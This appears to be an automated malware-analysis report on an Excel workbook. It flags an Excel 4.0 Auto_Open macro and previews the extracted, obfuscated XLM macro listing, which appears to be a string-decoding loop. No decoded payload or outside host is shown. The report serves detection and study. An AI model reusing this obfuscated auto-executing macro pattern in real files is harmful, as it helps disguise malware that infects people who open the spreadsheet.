MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6824 bytes |
SHA-256: fb1158b666feb829e6680a96e892fa96a13f621b57e4cdc66bb1d1e0ddf6c559 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - zMgsgGrqYS
' 0018 20 LABEL : Cell Value, String Constant - ACqKr len=0
' 0018 23 LABEL : Cell Value, String Constant - AuiRMIDb len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!E182
' 0018 23 LABEL : Cell Value, String Constant - bGByOjBB len=0
' 0018 27 LABEL : Cell Value, String Constant - cCdYJdIZhJfc len=0
' 0018 24 LABEL : Cell Value, String Constant - cUctvCjvf len=0
' 0018 21 LABEL : Cell Value, String Constant - DKzVAk len=0
' 0018 21 LABEL : Cell Value, String Constant - dNAZog len=0
' 0018 23 LABEL : Cell Value, String Constant - fAPCbVsD len=0
' 0018 27 LABEL : Cell Value, String Constant - gjqfkCMfWDls len=0
' 0018 23 LABEL : Cell Value, String Constant - JSfbXgDo len=0
' 0018 27 LABEL : Cell Value, String Constant - oRltGTvlYFMn len=0
' 0018 23 LABEL : Cell Value, String Constant - qpANoBef len=0
' 0018 25 LABEL : Cell Value, String Constant - tChTqesIEM len=0
' 0018 21 LABEL : Cell Value, String Constant - ULNbsq len=0
' 0018 20 LABEL : Cell Value, String Constant - UmrGe len=0
' 0018 23 LABEL : Cell Value, String Constant - wpGvBwCO len=0
' 0018 25 LABEL : Cell Value, String Constant - WWMCTWSpKd len=0
' 0018 22 LABEL : Cell Value, String Constant - yZBaoqE len=0
' 0018 25 LABEL : Cell Value, String Constant - zkEZXQkYth len=0
' 0018 23 LABEL : Cell Value, String Constant - ZXGhGCsg len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' zMgsgGrqYS,R51,"",-905.00000000000000000000
' zMgsgGrqYS,R52,"",615.00000000000000000000
' zMgsgGrqYS,R53,"",319.00000000000000000000
' zMgsgGrqYS,R54,"",63.00000000000000000000
' zMgsgGrqYS,R55,"",-227.00000000000000000000
' zMgsgGrqYS,R56,"",880.00000000000000000000
' zMgsgGrqYS,E100,"SET.NAME("UmrGe",0+VALUE("0"))",""
' zMgsgGrqYS,E105,"SET.NAME("fAPCbVsD",UmrGe)",""
' zMgsgGrqYS,E108,"SET.NAME("gjqfkCMfWDls",UmrGe)",""
' zMgsgGrqYS,E110,"SET.NAME("yZBaoqE",COUNTA(ULNbsq))",""
' zMgsgGrqYS,E112,"SET.NAME("oRltGTvlYFMn",COUNTA(cCdYJdIZhJfc))",""
' zMgsgGrqYS,E115,[],""
' zMgsgGrqYS,E117,"SET.NAME("ZXGhGCsg","")",""
' zMgsgGrqYS,E119,"fAPCbVsD",""
' zMgsgGrqYS,E121,"SET.NAME("DKzVAk",HLOOKUP("*",ULNbsq,fAPCbVsD,FALSE))",""
' zMgsgGrqYS,E126,"ACqKr",""
' zMgsgGrqYS,E128,"SET.NAME("JSfbXgDo",UmrGe)",""
' zMgsgGrqYS,E130,[],""
' zMgsgGrqYS,E132,"JSfbXgDo",""
' zMgsgGrqYS,E134,"wpGvBwCO",""
' zMgsgGrqYS,E139,"bGByOjBB",""
' zMgsgGrqYS,E141,"zkEZXQkYth",""
' zMgsgGrqYS,E143,"SET.NAME("cUctvCjvf",VALUE(HLOOKUP("*",cCdYJdIZhJfc,zkEZXQkYth,FALSE)))",""
' zMgsgGrqYS,E146,"tChTqesIEM",""
' zMgsgGrqYS,E150,"ZXGhGCsg",""
' zMgsgGrqYS,E154,"gjqfkCMfWDls",""
' zMgsgGrqYS,E158,NEXT(),""
' zMgsgGrqYS,E161,"WWMCTWSpKd",""
' zMgsgGrqYS,E164,[],""
' zMgsgGrqYS,E169,"qpANoBef",""
' zMgsgGrqYS,E173,NEXT(),""
' zMgsgGrqYS,E177,RETURN(),""
' zMgsgGrqYS,E204,"SET.NAME("AuiRMIDb",E100)",""
' zMgsgGrqYS,E206,"ULNbsq",""
' zMgsgGrqYS,E209,"SET.NAME("cCdYJdIZhJfc",R43C14)",""
' zMgsgGrqYS,E212,"SET.NAME("qpANoBef",222)",""
' zMgsgGrqYS,E217,"SET.NAME("dNAZog",5)",""
' zMgsgGrqYS,E221,AuiRMIDb(),""
' zMgsgGrqYS,E222,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.